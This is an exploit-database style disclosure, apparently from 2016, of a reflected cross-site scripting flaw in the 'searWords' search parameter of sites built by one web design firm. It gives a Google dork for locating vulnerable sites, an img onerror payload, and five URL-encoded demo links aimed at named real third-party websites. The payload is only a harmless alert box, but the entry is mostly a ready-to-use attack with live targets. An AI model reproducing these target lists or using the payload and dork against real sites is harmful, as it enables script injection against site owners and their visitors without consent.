######################
# Exploit Title : Designed by Alkawebs Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : alkawebs.co.uk
# Google Dork : "Designed by Alkawebs"
# Date: 2016/02/04
#
######################
# PoC:
# Search searWords = [XSS]
# Payload = <img onerror=alert(1) src="asd">
# Demo:
#http://www.integritasadvocacy.org.uk/search.php?searWords=%3Cimg%20onerror%3Dalert%281%29%20src%3D%22asd%22%3E
#http://www.thestuff.org.uk/search.php?searWords=%3Cimg%20onerror%3Dalert%281%29%20src%3D%22asd%22%3E
#http://disabilitydirect.com/nottingham/search.php?searWords=%27%3E%3Cimg%20onerror%3Dalert%281%29%20src%3D%22asd%22%3E
#http://www.chores4you.co.uk/search.php?searWords=%27%3E%3Cimg%20onerror%3Dalert%281%29%20src%3D%22asd%22%3E
#http://www.ddenterprise.co.uk/search.php?searWords=%27%3E%3Cimg%20onerror%3Dalert%281%29%20src%3D%22asd%22%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################